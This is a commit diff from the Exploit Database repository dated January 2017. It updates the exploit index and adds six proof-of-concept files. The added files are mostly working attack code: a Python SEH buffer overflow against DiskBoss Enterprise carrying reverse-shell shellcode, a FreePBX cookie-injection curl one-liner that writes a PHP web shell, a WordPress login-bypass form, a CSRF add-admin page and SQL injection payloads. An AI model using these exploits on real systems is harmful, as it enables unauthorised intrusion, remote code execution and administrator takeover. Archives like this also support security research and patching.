DB: 2017-01-11

6 new exploits

DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)

ClaSS 0.8.60 - (export.php ftype) Local File Inclusion
ClaSS 0.8.60 - 'export.php' Local File Inclusion

Miniweb 2.0 - SQL Injection (Authentication Bypass)
Miniweb 2.0 - Authentication Bypass
eDNews 2.0 - (lg) Local File Inclusion
eDContainer 2.22 - (lg) Local File Inclusion
eDNews 2.0 - Local File Inclusion
eDContainer 2.22 - Local File Inclusion
Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation
Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection
Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection
Ultimate PHP Board 2.2.1 - Privilege Escalation
Sepcity Shopping Mall - SQL Injection
Sepcity Lawyer Portal - SQL Injection
Sepcity Classified - 'classdis.asp ID' SQL Injection
FlexPHPDirectory 0.0.1 - (Authentication Bypass) SQL Injection
Flexphpsite 0.0.1 - (Authentication Bypass) SQL Injection
Flexphplink 0.0.x - (Authentication Bypass) SQL Injection
eDNews 2.0 - (eDNews_view.php newsid) SQL Injection
Sepcity Classified - 'ID' Parameter SQL Injection
FlexPHPDirectory 0.0.1 - Authentication Bypass
Flexphpsite 0.0.1 - Authentication Bypass
Flexphplink 0.0.x - Authentication Bypass
eDNews 2.0 - SQL Injection

PHPAlumni - 'Acomment.php id' SQL Injection
PHPAlumni - SQL Injection

Flexphpic 0.0.x - (Authentication Bypass) SQL Injection
Flexphpic 0.0.x - Authentication Bypass

Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection
Mole Group Vacation Estate Listing Script - Blind SQL Injection

Friends in War Make or Break 1.3 - SQL Injection (Authentication Bypass)
Friends in War Make or Break 1.3 - Authentication Bypass
My Php Dating 2.0 - 'path' Parameter SQL Injection
My Php Dating 2.0 - 'id' Parameter SQL Injection
My PHP Dating 2.0 - 'path' Parameter SQL Injection
My PHP Dating 2.0 - 'id' Parameter SQL Injection
Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection
Starting Page 1.3 - SQL Injection
Freepbx < 2.11.1.5 - Remote Code Execution
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation
FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)
This commit is contained in:
Offensive Security 2017-01-11 05:01:17 +00:00
parent 574c0f2df8
commit 1b13c8a790
7 changed files with 247 additions and 18 deletions

View file

@ -15204,6 +15204,7 @@ id,file,description,date,author,platform,type,port
40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22
40984,platforms/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote,0
40990,platforms/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0
41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -20356,9 +20357,9 @@ id,file,description,date,author,platform,type,port
7574,platforms/php/webapps/7574.txt,"Joomla! Component mDigg 2.2.8 - 'category' Parameter SQL Injection",2008-12-24,boom3rang,php,webapps,0
7575,platforms/php/webapps/7575.pl,"Joomla! Component 5starhotels - SQL Injection",2008-12-24,EcHoLL,php,webapps,0
7576,platforms/php/webapps/7576.pl,"PHP-Fusion 7.0.2 - Blind SQL Injection",2008-12-24,StAkeR,php,webapps,0
7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - (export.php ftype) Local File Inclusion",2008-12-24,fuzion,php,webapps,0
7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - 'export.php' Local File Inclusion",2008-12-24,fuzion,php,webapps,0
7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 - 'lang' Local File Inclusion",2008-12-24,fuzion,php,webapps,0
7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - SQL Injection (Authentication Bypass)",2008-12-28,bizzit,php,webapps,0
7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - Authentication Bypass",2008-12-28,bizzit,php,webapps,0
7587,platforms/php/webapps/7587.txt,"Joomla! Component PAX Gallery 0.1 - Blind SQL Injection",2008-12-28,XaDoS,php,webapps,0
7593,platforms/php/webapps/7593.pl,"DeluxeBB 1.2 - Blind SQL Injection",2008-12-28,StAkeR,php,webapps,0
7595,platforms/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Authentication Bypass",2008-12-28,k3yv4n,php,webapps,0
@ -20369,26 +20370,26 @@ id,file,description,date,author,platform,type,port
7600,platforms/php/webapps/7600.pl,"Flexphplink Pro - Arbitrary File Upload",2008-12-28,Osirys,php,webapps,0
7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0
7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - (Authentication Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0
7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
7605,platforms/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password",2008-12-29,cOndemned,php,webapps,0
7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 - Authentication Bypass Change User Password",2008-12-29,R31P0l,php,webapps,0
7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation",2008-12-29,StAkeR,php,webapps,0
7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - Privilege Escalation",2008-12-29,StAkeR,php,webapps,0
7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall - SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal - SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection",2008-12-29,s4avrd0w,php,webapps,0
7612,platforms/php/webapps/7612.txt,"Joomla! Component com_na_content 1.0 - Blind SQL Injection",2008-12-29,"Mehmet Ince",php,webapps,0
7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'classdis.asp ID' SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0
7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0
7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0
7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0
7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - (eDNews_view.php newsid) SQL Injection",2008-12-29,"Virangar Security",php,webapps,0
7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'ID' Parameter SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0
7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps,0
7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps,0
7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - Authentication Bypass",2008-12-29,x0r,php,webapps,0
7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - SQL Injection",2008-12-29,"Virangar Security",php,webapps,0
7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary File Upload",2008-12-29,siurek22,php,webapps,0
7621,platforms/php/webapps/7621.txt,"PHPAlumni - 'Acomment.php id' SQL Injection",2008-12-29,Mr.SQL,php,webapps,0
7621,platforms/php/webapps/7621.txt,"PHPAlumni - SQL Injection",2008-12-29,Mr.SQL,php,webapps,0
7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Login Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0
7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - (Authentication Bypass) SQL Injection",2008-12-30,S.W.A.T.,php,webapps,0
7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - Authentication Bypass",2008-12-30,S.W.A.T.,php,webapps,0
7625,platforms/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection / Local File Inclusion",2008-12-30,SirGod,php,webapps,0
7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection",2008-12-30,x0r,php,webapps,0
7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - Blind SQL Injection",2008-12-30,x0r,php,webapps,0
7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0
7628,platforms/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0
7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0
@ -26240,7 +26241,7 @@ id,file,description,date,author,platform,type,port
22730,platforms/asp/webapps/22730.txt,"Mailtraq 2.2 - Browse.asp Cross-Site Scripting",2003-06-04,"Ziv Kamir",asp,webapps,0
22731,platforms/asp/webapps/22731.txt,"Mailtraq 2.2 - Webmail Utility Full Path Disclosure",2003-06-04,"Ziv Kamir",asp,webapps,0
22735,platforms/php/webapps/22735.txt,"iDev Rentals 1.0 - Multiple Vulnerabilities",2012-11-15,Vulnerability-Lab,php,webapps,0
22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - SQL Injection (Authentication Bypass)",2012-11-15,d3b4g,php,webapps,0
22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - Authentication Bypass",2012-11-15,d3b4g,php,webapps,0
22741,platforms/php/webapps/22741.txt,"BabyGekko 1.2.2e - Multiple Vulnerabilities",2012-11-15,"High-Tech Bridge SA",php,webapps,0
22742,platforms/php/webapps/22742.txt,"ReciPHP 1.1 - SQL Injection",2012-11-15,cr4wl3r,php,webapps,0
22743,platforms/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 - Admin.cgi Directory Traversal",2003-06-05,"Paul Craig",cgi,webapps,0
@ -36941,5 +36942,10 @@ id,file,description,date,author,platform,type,port
40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0
40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0
40998,platforms/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps,0
40999,platforms/php/webapps/40999.txt,"My Php Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
41001,platforms/php/webapps/41001.txt,"My Php Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0
40999,platforms/php/webapps/40999.txt,"My PHP Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
41001,platforms/php/webapps/41001.txt,"My PHP Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0
41002,platforms/php/webapps/41002.txt,"Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection",2017-01-09,v3n0m,php,webapps,0
41004,platforms/php/webapps/41004.txt,"Starting Page 1.3 - SQL Injection",2017-01-10,JaMbA,php,webapps,0
41005,platforms/php/webapps/41005.txt,"Freepbx < 2.11.1.5 - Remote Code Execution",2016-12-23,inj3ctor3,php,webapps,0
41006,platforms/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps,0
41007,platforms/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

42
platforms/php/webapps/41002.txt Executable file
View file

@ -0,0 +1,42 @@
# Exploit : Make or Break 1.7 (imgid) SQL Injection Vulnerability
# Author : v3n0m
# Contact : v3n0m[at]outlook[dot]com
# Date : January, 09-2017 GMT +7:00 Jakarta, Indonesia
# Software : Make or Break
# Version : 1.7 Lower versions may also be affected
# License : Free
# Download : http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
# Credits : YOGYACARDERLINK, Dhea Fathin Karima & YOU !!
1. Description
An attacker can exploit this vulnerability to read from the database.
The parameter 'imgid' is vulnerable.
2. Proof of Concept
http://domain.tld/[path]/index.php?imgid=-9999+union+all+select+null,null,null,null,version(),null--
# Exploitation via SQLMap
Parameter: imgid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: imgid=1 AND 4688=4688
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: imgid=1 OR SLEEP(2)
Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: imgid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176786271,0x746264586d76465246657a5778446f756c6d696859494e7247735476506447726470676f4e544c59,0x71706b7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WQyQ
Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]
3. Security Risk
The security risk of the remote sql-injection web vulnerability in the Make or Break CMS is estimated as high.

22
platforms/php/webapps/41004.txt Executable file
View file

@ -0,0 +1,22 @@
# Vulnerability: Starting Page- SQL Injection
# Date: 10.01.2017
# Vendor Homepage: http://software.friendsinwar.com/
# Tested on: win10
# Author: JaMbA
# Script link: http://software.friendsinwar.com/news.php?readmore=31
#########################
# SQL Injection/Exploit :
# Vulnerable Parametre : linkid
# http://localhost/[PATH]/outgoing.php?linkid=[SQL]
Tunisia 4 ever

37
platforms/php/webapps/41005.txt Executable file
View file

@ -0,0 +1,37 @@
Exploit Title: Freepbx coockie recordings injection
Google Dork: Ask Santa
Date: 23/12/2016
Exploit Author: inj3ctor3
Vendor Homepage: https://www.freepbx.org/
Software Link: ISO LINKS IN SITE https://www.freepbx.org/
Version: ALL && unpatched/ (Trixbox/freepbx/elastix/pbxinflash/)
Tested on: Centos 6
CVE : CVE-2014-7235
1. Description
a critical Zero-Day Remote Code Execution and Privilege Escalation
exploit within the legacy “FreePBX ARI Framework module/Asterisk
Recording Interface (ARI)”.
htdocs_ari/includes/login.php in the ARI Framework module/Asterisk Recording Interface (ARI) in FreePBX before 2.9.0.9, 2.10.x,
and 2.11 before 2.11.1.5 allows remote attackers to execute arbitrary code via the ari_auth coockie,
related to the PHP unserialize function
<?php
.....
...
line 56 $buf = unserialize(stripslashes($_COOKIE['ari_auth']));
line 57 list($data,$chksum) = $buf;
....
?>
A successful attack may compromise the whole system aiding the hacker to gain
further privileges via taking advantage of famous nmap shell
without further or do this is a poc code
curl -ks -m20 http://127.0.0.1/recordings/index.php" --cookie "ari_lang=() { :;};php -r 'set_time_limit(0);unlink("page.framework.php");file_put_contents("misc/audio.php", "<?php if(\$_COOKIE[\"lang\"]) {system(\$_COOKIE[\"lang\"]);}die();?>");';ari_auth=O:8:"DB_mysql":6:{s:19:"_default_error_mode";i:16;s:22:"_default_error_options";s:9:"do_reload";s:12:"_error_class";s:4:"TEST";s:13:"was_connected";b:1;s:7:"options";s:3:"123";s:3:"dsn";a:4:{s:8:"hostspec";s:9:"localhost";s:8:"username";s:4:"root";s:8:"password";s:0:"";s:8:"database";s:7:"trigger";}};elastixSession=716ratk092555gl0b3gtvt8fo7;UICSESSION=rporp4c88hg63sipssop3kdmn2;ARI=b8e4h6vfg0jouquhkcblsouhk0" --data "username=admin&password=admin&submit=btnSubmit" >/dev/null
if curl -ks -m10 "http://127.0.0.1/recordings/misc/audio.php" --cookie "lang=id" | grep asterisk >/dev/null;then echo "127.0.0.1/recordings/misc/audio.php" | tee -a xploited_new.txt;fi

24
platforms/php/webapps/41006.txt Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation
# Date: 10-01-2017
# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: web
1. Description
You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().
http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html
2. Proof of Concept
<form method="post" action="http://wp/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
Then you can go to admin panel.

View file

@ -0,0 +1,32 @@
# # # # #
# Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...)
# Google Dork: FMyLife Clone Script
# Date:10.01.2017
# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm
# Tested on: http://www.tellaboutit.com/admin/
# Script Name: FMyLife Clone Script (Pro Edition)
# Script Version: 1.1
# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
#Exploit :
<html>
<body>
<h2>Add an Administrator</h2>
<form action="http://localhost/[PATH]/admin/" method="post">
<div id="add-admin-form">
<input type="hidden" name="action" value="add-admin" />
<label for="username">Username:</label>
<input type="text" id="username" name="admin-username" value="" />
<div class="spacer"></div>
<label for="password">Password:</label>
<input type="password" id="password" name="admin-password" value="" />
<div class="spacer"></div>
<input type="image" src="add-administrator.png" name="add-admin" id="add-admin" value="Add Administrator" />
</div>
</form>
</body>
</html>
# # # # #

View file

@ -0,0 +1,66 @@
#!/usr/bin/python
# Exploit Title: DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow
# Date: 10-01-2017
# Exploit Author: Wyndell Bibera
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.5.12.exe
# Version: 7.5.12
# Tested on: Windows XP Professional SP3
import socket
ip = "192.168.86.150"
port = 80
egg = "ezggezgg"
nopslide = "\x90" * 8
# Bad characters: \x00\x09\x0a\x0d\x20
# Reverse Shell @ Port 443 - Change shellcode section accordingly
shellcode = ("\xb8\x45\x49\xe1\x98\xda\xc5\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x52\x31\x47\x12\x03\x47\x12\x83\x82\x4d\x03\x6d\xf0\xa6\x41"
"\x8e\x08\x37\x26\x06\xed\x06\x66\x7c\x66\x38\x56\xf6\x2a\xb5"
"\x1d\x5a\xde\x4e\x53\x73\xd1\xe7\xde\xa5\xdc\xf8\x73\x95\x7f"
"\x7b\x8e\xca\x5f\x42\x41\x1f\x9e\x83\xbc\xd2\xf2\x5c\xca\x41"
"\xe2\xe9\x86\x59\x89\xa2\x07\xda\x6e\x72\x29\xcb\x21\x08\x70"
"\xcb\xc0\xdd\x08\x42\xda\x02\x34\x1c\x51\xf0\xc2\x9f\xb3\xc8"
"\x2b\x33\xfa\xe4\xd9\x4d\x3b\xc2\x01\x38\x35\x30\xbf\x3b\x82"
"\x4a\x1b\xc9\x10\xec\xe8\x69\xfc\x0c\x3c\xef\x77\x02\x89\x7b"
"\xdf\x07\x0c\xaf\x54\x33\x85\x4e\xba\xb5\xdd\x74\x1e\x9d\x86"
"\x15\x07\x7b\x68\x29\x57\x24\xd5\x8f\x1c\xc9\x02\xa2\x7f\x86"
"\xe7\x8f\x7f\x56\x60\x87\x0c\x64\x2f\x33\x9a\xc4\xb8\x9d\x5d"
"\x2a\x93\x5a\xf1\xd5\x1c\x9b\xd8\x11\x48\xcb\x72\xb3\xf1\x80"
"\x82\x3c\x24\x06\xd2\x92\x97\xe7\x82\x52\x48\x80\xc8\x5c\xb7"
"\xb0\xf3\xb6\xd0\x5b\x0e\x51\x1f\x33\x46\x2d\xf7\x46\x66\x2c"
"\xb3\xce\x80\x44\xd3\x86\x1b\xf1\x4a\x83\xd7\x60\x92\x19\x92"
"\xa3\x18\xae\x63\x6d\xe9\xdb\x77\x1a\x19\x96\x25\x8d\x26\x0c"
"\x41\x51\xb4\xcb\x91\x1c\xa5\x43\xc6\x49\x1b\x9a\x82\x67\x02"
"\x34\xb0\x75\xd2\x7f\x70\xa2\x27\x81\x79\x27\x13\xa5\x69\xf1"
"\x9c\xe1\xdd\xad\xca\xbf\x8b\x0b\xa5\x71\x65\xc2\x1a\xd8\xe1"
"\x93\x50\xdb\x77\x9c\xbc\xad\x97\x2d\x69\xe8\xa8\x82\xfd\xfc"
"\xd1\xfe\x9d\x03\x08\xbb\xae\x49\x10\xea\x26\x14\xc1\xae\x2a"
"\xa7\x3c\xec\x52\x24\xb4\x8d\xa0\x34\xbd\x88\xed\xf2\x2e\xe1"
"\x7e\x97\x50\x56\x7e\xb2")
scpad = "\x90" * (2480 - len(shellcode) - len(nopslide))
shortjmp = "\xeb\x0f\x90\x90"
# Search for string 'ezgg' twice
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x65\x7a\x67\x67\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
extra = "\x90" * 9
pad = "\x90" * (5000 - len(extra) - 2496 - len(egghunter))
# POP POP RET Instruction
seh = "\x6b\xa6\x02\x10"
buffer = (
"POST " + egg + nopslide + shellcode + scpad + shortjmp + seh + extra + egghunter + pad + " HTTP/1.1\r\n"
"Host: :192.168.86.150\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/* ;q=0.8\r\n\r\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(buffer)
s.close()